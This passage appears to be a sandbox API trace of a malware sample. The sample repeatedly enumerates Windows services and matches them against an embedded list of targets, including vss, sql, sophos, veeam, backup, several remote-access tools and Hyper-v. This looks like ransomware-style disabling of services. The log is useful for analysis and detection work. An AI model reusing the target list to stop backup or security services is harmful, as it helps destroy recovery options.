lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0165.368] CloseServiceHandle (hSCObject=0x3585f80) returned 1 [0165.368] OpenServiceA (hSCManager=0x3585850, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x3585cb0 [0165.370] QueryServiceStatusEx (in: hService=0x3585cb0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0165.371] CloseServiceHandle (hSCObject=0x3585cb0) returned 1 [0165.788] OpenServiceA (hSCManager=0x3585850, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x3585d78 [0165.789] QueryServiceStatusEx (in: hService=0x3585d78, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0165.789] CloseServiceHandle (hSCObject=0x3585d78) returned 1 [0165.825] GetProcessHeap () returned 0x3520000 [0165.825] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35f6428 | out: hHeap=0x3520000) returned 1 [0165.825] CloseServiceHandle (hSCObject=0x3585850) returned 1 [0165.825] SetEvent (hEvent=0x20c) returned 1 [0165.825] Sleep (dwMilliseconds=0x2710) [0175.867] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x3586160 [0175.869] EnumServicesStatusA (in: hSCManager=0x3586160, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0175.948] GetLastError () returned 0xea [0175.948] GetProcessHeap () returned 0x3520000 [0175.948] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x35cee48 [0175.950] EnumServicesStatusA (in: hSCManager=0x3586160, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x35cee48, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x35cee48*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0176.071] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0176.071] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0176.072] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0176.073] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0176.074] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0176.075] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0176.076] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0176.077] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0176.078] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0176.079] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0176.080] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0176.081] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0176.082] OpenServiceA (hSCManager=0x3586160, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x35862c8 [0176.083] QueryServiceStatusEx (in: hService=0x35862c8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0176.083] CloseServiceHandle (hSCObject=0x35862c8) returned 1 [0176.083] OpenServiceA (hSCManager=0x3586160, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3586368 [0176.084] QueryServiceStatusEx (in: hService=0x3586368, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0176.084] CloseServiceHandle (hSCObject=0x3586368) returned 1 [0176.095] OpenServiceA (hSCManager=0x3586160, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x3586570 [0176.140] QueryServiceStatusEx (in: hService=0x3586570, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0176.144] CloseServiceHandle (hSCObject=0x3586570) returned 1 [0176.154] OpenServiceA (hSCManager=0x3586160, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x3586408 [0176.155] QueryServiceStatusEx (in: hService=0x3586408, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0176.156] Sleep (dwMilliseconds=0x3e8) [0177.328] QueryServiceStatusEx (in: hService=0x3586408, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0177.329] GetTickCount () returned 0x116d028 [0177.329] CloseServiceHandle (hSCObject=0x3586408) returned 1 [0177.334] OpenServiceA (hSCManager=0x3586160, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x35865e8 [0177.342] QueryServiceStatusEx (in: hService=0x35865e8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0177.343] CloseServiceHandle (hSCObject=0x35865e8) returned 1 [0177.343] OpenServiceA (hSCManager=0x3586160, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x3586430 [0177.343] QueryServiceStatusEx (in: hService=0x3586430, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0177.344] CloseServiceHandle (hSCObject=0x3586430) returned 1 [0177.428] OpenServiceA (hSCManager=0x3586160, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x35864f8 [0177.723] QueryServiceStatusEx (in: hService=0x35864f8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0177.724] CloseServiceHandle (hSCObject=0x35864f8) returned 1 [0177.881] GetProcessHeap () returned 0x3520000 [0177.881] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35cee48 | out: hHeap=0x3520000) returned 1 [0177.961] CloseServiceHandle (hSCObject=0x3586160) returned 1 [0177.961] SetEvent (hEvent=0x20c) returned 1 [0177.961] Sleep (dwMilliseconds=0x2710) [0218.471] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x3585850 [0219.484] EnumServicesStatusA (in: hSCManager=0x3585850, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0219.498] GetLastError () returned 0xea [0219.498] GetProcessHeap () returned 0x3520000 [0219.498] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x5d3a348 [0219.500] EnumServicesStatusA (in: hSCManager=0x3585850, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x5d3a348, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x5d3a348*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, 